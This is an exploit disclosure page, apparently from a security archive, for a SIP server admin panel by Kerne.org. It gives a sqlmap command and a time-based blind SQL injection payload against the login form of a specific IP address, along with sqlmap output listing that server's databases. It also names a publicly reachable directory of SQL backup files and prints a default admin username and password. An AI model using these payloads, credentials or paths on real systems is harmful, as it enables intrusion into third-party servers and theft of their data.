SIP Server By Kerne.org SQL Injection / Backup Disclosure

2014.05.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

SIP Server by Kerne.org - Multiple Vulnerabilties =================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Script : Kerne.org #################################################################### [1] Time-Based Blind Injection [POST] ======================================== sqlmap.py -u "http://177.129.8.146/admin/index.php" --data="action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" -p "username" --level=5 --risk=5 --dbs sqlmap identified the following injection points with a total of 1751 HTTP(s) requests: --- Place: POST Parameter: username Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM --- web server operating system: Linux Ubuntu 12.04 (Precise Pangolin) web application technology: Apache 2.2.22, PHP 5.3.10 back-end DBMS: MySQL >= 5.0.0 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: username Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM --- web server operating system: Linux Ubuntu 12.04 (Precise Pangolin) web application technology: Apache 2.2.22, PHP 5.3.10 back-end DBMS: MySQL 5 available databases [5]: [*] billing [*] cdr [*] information_schema [*] proftpd [*] test [2] Backup download ==================== Go To [http://177.129.8.146/admin/sql/] You Find Sql Files And Download [3] Default Data Admin Login: ============================== Username: Operations Password: k3cn18


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top